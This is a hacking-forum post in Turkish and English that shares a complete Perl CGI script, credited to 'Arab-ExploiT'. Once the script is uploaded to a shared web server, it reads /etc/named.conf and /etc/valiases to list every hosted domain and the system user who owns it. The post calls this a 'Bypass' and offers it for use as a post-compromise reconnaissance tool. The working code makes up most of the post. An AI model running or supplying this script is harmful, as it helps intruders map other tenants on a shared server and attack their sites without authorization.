Show user in server (1 Viewer)

st0rm 

Vay Vay Vay
Joined
Mar 27, 2016
Credits
1,900
Rating - 0%
Bu dosya serverınıza attıgınız zaman domain ve userları görüntüler , her server da olacak diye bir kaidede yoktur. Bunu .pl uzantı da kaydediniz

It shows domain and user in the server when you upload it in server , I don't mean that it works in every server :) Save it as .pl


Code:
#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/html\n\n";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>C0ded By Karar alShaMi</title>
<title>WwW.Arab-ExploiT.CoM</title>
<style type="text/css">
.newStyle1 {
background-color: #000000;
font-family: "Courier New", Courier, monospace;
font-size: large;
font-weight: bold;
color: #FFFFFF;
}
.style1 {
text-align: center;
}
</style>
</head>

<body class="newStyle1">

<p class="style1">Domains &amp; Users </p>
<p class="style1">Bypass</p>
<p class="style1">By Karar alShaMi </p>
<p class="style1"> <font color="#FF0000">WwW.Arab-ExploiT.CoM</font></p>
';
open (d0mains, '/etc/named.conf') or $err=1;
@kr = <d0mains>;
close d0mains;
if ($err){
print ('<p class="style1">&nbsp;</p><p class="style1">C0uldn\'t Bypass it , Sorry</p>');
die();
}else{
print '<p class="style1">&nbsp;</p>
<p class="style1">H3r3 !s 411 D0m4!ns &amp; Us3rs :</p>
';}
foreach my $one (@kr)
{
if($one =~ m/.*?zone "(.*?)" {/){
$filename= "/etc/valiases/".$1;
$owner = getpwuid((stat($filename))[4]);
print '<p class="style1">'.$1.' : '.$owner.'</p>
';
}
}
print'</body></html>';
 

Users who are viewing this thread

Top